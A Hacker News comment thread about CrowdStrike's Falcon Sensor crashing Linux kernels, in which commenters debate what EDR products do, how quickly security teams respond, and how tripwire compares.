←back to thread

CrowdStrike's Falcon Sensor also linked to Linux kernel panics and crashes

(www.theregister.com)
158 points kenjackson | 2 comments | 22 Jul 24 02:22 UTC | HN request time: 0.001s | source
Show context
ykonstant ◴[22 Jul 24 06:05 UTC] No.41031312[source]
Sorry to hijack this post, but for affected admins reading this: how is the recovery process going? What is your estimated time to normalcy?

Also, for Linux and especially BSD admins: has this incident affected your perspective on EDR/XDR systems in the kernel? What would you suggest as an alternative to ensure regulatory compliance?

replies(2): >>41031360 #>>41041546 #
tgv ◴[22 Jul 24 06:15 UTC] No.41031360[source]
I do manage a few Linux machines (firewall passes only http and https -> nginx -> custom backend), but I'd never heard of Crowdstrike before. I don't even know what their product is supposed to do. As far as I can see, kernel level protection could only help prevent someone bypassing the firewall and trigger an exploit in nginx. But if Crowdstrike knows about such exploits, everyone does, and the firewall or nginx gets patched.

What am I missing?

Edit: I know it is supposed to implement "EDR", but it's always explained in the vaguest of terms.

replies(5): >>41031414 #>>41031431 #>>41031453 #>>41033240 #>>41034207 #
jabroni_salad ◴[22 Jul 24 06:31 UTC] No.41031453[source]
> But if Crowdstrike knows about such exploits, everyone does

This is actually the most important thing happening with EDR as a concept, it handles novel cases that have never been seen before, with a human review very quickly. Our csirt has an SLA of 3 minutes.

It's right there in the name acronym. Detection and Response.

replies(2): >>41031905 #>>41034825 #
therein ◴[22 Jul 24 08:07 UTC] No.41031905[source]
So like let's say a user of a computer in my fleet ran something infected with malware that had enough diligence to have a unique file signature. It puts itself to startup items in a creative way and then calls back home with just a standard SSH connection.

In that case are you telling me their pitch is that they detect this behavior, dispatch some human agent from their CSIRT within 3 minutes to remotely but manually come check the binary, dump some strings, do some reverse engineering and track the CC server etc?

replies(3): >>41032312 #>>41032982 #>>41036029 #
p_l ◴[22 Jul 24 10:56 UTC] No.41032982[source]
Not necessarily from Crowdstrike CSIRT, but I have experience of security calling me back within 30 minutes of changing system security impacting file to verify that it was done by me and not something else.

Probably because they had already looked at the modification which was benign so slower escalation path in absence of other indicators.

replies(1): >>41034864 #
1. rswail ◴[22 Jul 24 14:31 UTC] No.41034864{3}[source]
tripwire(1) has been part of systems for decades.

Bullshit about "they had already looked at the modification which was benign".

So your "security" is to totally expose every operation of your software to an external party with absolutely no auditing of what data they are exfiltrating from your system?

replies(1): >>41035397 #
2. p_l ◴[22 Jul 24 15:13 UTC] No.41035397[source]
It was handled by internal security team.

Also, tripwire was limited to periodically scanning files, couldn't scan for example syscalls and trace relationships between them.

But yes, tripwire is a very early EDR/XDR.